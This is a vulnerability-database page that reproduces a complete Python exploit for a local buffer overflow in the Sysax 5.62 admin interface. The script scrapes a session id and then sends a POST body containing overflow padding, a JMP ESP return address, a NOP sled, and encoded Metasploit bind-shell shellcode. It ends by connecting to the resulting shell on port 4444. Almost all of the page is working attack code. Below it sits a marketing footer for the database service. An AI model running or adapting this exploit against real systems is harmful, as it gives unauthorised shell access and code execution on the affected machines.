Lucene search
K

Sysax-5.62-Admin-Interface-

🗓️ 05 Jan 2015 15:55:42Reported by Craig FreymanType 
exploitpack
 exploitpack
👁 20 Views

Sysax <= 5.62 Admin Interface Local Buffer Overflow by @cd1zz www.pwnag3.com. Access admin interface through local buffer overflow. Extract sid from page using regex. Exploit with POST request and send pwnag3 for shell access

Code
import socket,sys,time,re,base64,subprocess
 
def main():
    global login
    print "\n"
    print "****************************************************************************"
    print "        Sysax <= 5.62 Admin Interface Local Buffer Overflow                 "
    print "                      by @cd1zz www.pwnag3.com                              "
    print "****************************************************************************"
 
    #initial GET
    login = "GET /scgi? HTTP/1.1\r\n"
    login +="Host: localhost:88\r\n"
    login += "Referer: http://localhost:88\r\n\r\n"
 
    try:
        r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        r.connect((target, port))
        print "[+] Accessing admin interface"
        r.send(login)
    except Exception, e:
        print "[-] There was a problem"
        print e
     
    #loop the recv sock so we get the full page
    page = ''   
    fullpage = ''   
    while "</html>" not in fullpage:
        page = r.recv(4096)
        fullpage += page
    time.sleep(1)
 
    #regex the sid from the page
    global sid
    sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
    if sid is None:
        print "[-] There was a problem finding your SID"
        sys.exit(1)
    time.sleep(1)
    r.close()
 
def exploit():
    #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
    shell = (
    "\xdb\xd5\xd9\x74\x24\xf4\xb8\xc3\x8f\xb3\x3e\x5b\x33\xc9"
    "\xb1\x56\x31\x43\x18\x03\x43\x18\x83\xeb\x3f\x6d\x46\xc2"
    "\x57\xfb\xa9\x3b\xa7\x9c\x20\xde\x96\x8e\x57\xaa\x8a\x1e"
    "\x13\xfe\x26\xd4\x71\xeb\xbd\x98\x5d\x1c\x76\x16\xb8\x13"
    "\x87\x96\x04\xff\x4b\xb8\xf8\x02\x9f\x1a\xc0\xcc\xd2\x5b"
    "\x05\x30\x1c\x09\xde\x3e\x8e\xbe\x6b\x02\x12\xbe\xbb\x08"
    "\x2a\xb8\xbe\xcf\xde\x72\xc0\x1f\x4e\x08\x8a\x87\xe5\x56"
    "\x2b\xb9\x2a\x85\x17\xf0\x47\x7e\xe3\x03\x81\x4e\x0c\x32"
    "\xed\x1d\x33\xfa\xe0\x5c\x73\x3d\x1a\x2b\x8f\x3d\xa7\x2c"
    "\x54\x3f\x73\xb8\x49\xe7\xf0\x1a\xaa\x19\xd5\xfd\x39\x15"
    "\x92\x8a\x66\x3a\x25\x5e\x1d\x46\xae\x61\xf2\xce\xf4\x45"
    "\xd6\x8b\xaf\xe4\x4f\x76\x1e\x18\x8f\xde\xff\xbc\xdb\xcd"
    "\x14\xc6\x81\x99\xd9\xf5\x39\x5a\x75\x8d\x4a\x68\xda\x25"
    "\xc5\xc0\x93\xe3\x12\x26\x8e\x54\x8c\xd9\x30\xa5\x84\x1d"
    "\x64\xf5\xbe\xb4\x04\x9e\x3e\x38\xd1\x31\x6f\x96\x89\xf1"
    "\xdf\x56\x79\x9a\x35\x59\xa6\xba\x35\xb3\xd1\xfc\xfb\xe7"
    "\xb2\x6a\xfe\x17\x25\x37\x77\xf1\x2f\xd7\xd1\xa9\xc7\x15"
    "\x06\x62\x70\x65\x6c\xde\x29\xf1\x38\x08\xed\xfe\xb8\x1e"
    "\x5e\x52\x10\xc9\x14\xb8\xa5\xe8\x2b\x95\x8d\x63\x14\x7e"
    "\x47\x1a\xd7\x1e\x58\x37\x8f\x83\xcb\xdc\x4f\xcd\xf7\x4a"
    "\x18\x9a\xc6\x82\xcc\x36\x70\x3d\xf2\xca\xe4\x06\xb6\x10"
    "\xd5\x89\x37\xd4\x61\xae\x27\x20\x69\xea\x13\xfc\x3c\xa4"
    "\xcd\xba\x96\x06\xa7\x14\x44\xc1\x2f\xe0\xa6\xd2\x29\xed"
    "\xe2\xa4\xd5\x5c\x5b\xf1\xea\x51\x0b\xf5\x93\x8f\xab\xfa"
    "\x4e\x14\xdb\xb0\xd2\x3d\x74\x1d\x87\x7f\x19\x9e\x72\x43"
    "\x24\x1d\x76\x3c\xd3\x3d\xf3\x39\x9f\xf9\xe8\x33\xb0\x6f"
    "\x0e\xe7\xb1\xa5")
     
    nops = "\x90" * 20
    #7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072
    jmp_esp = "\x87\xA7\xA7\x7C"
    payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops))
     
    #setup exploit
    exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1\r\n"
    exploit += "Host: localhost:88\r\n"
    exploit += "Content-Type: application/x-www-form-urlencoded\r\n"
    exploit += "Content-Length: "+ str(len(payload)+3)+"\r\n\r\n"
    exploit += "e2="+payload+"\r\n\r\n"
 
    try:
        r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        r.connect((target, port))
        print "[+] Sending pwnag3"
        r.send(exploit)
    except Exception, e:
        print "[-] There was a problem"
        print e
    time.sleep(2)
    print "[+] Here is your shell..."
    subprocess.Popen("telnet localhost 4444", shell=True).wait()
    sys.exit(1)
 
if __name__ == '__main__':
    if len(sys.argv) != 1:
        print "[-] Usage: %s"
        sys.exit(1)
     
    #by default it binds to 127.0.0.1 on 88
    target = "127.0.0.1"
    port = 88
    main()
    exploit()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2015 15:55Current
0.5Low risk
Vulners AI Score0.5
20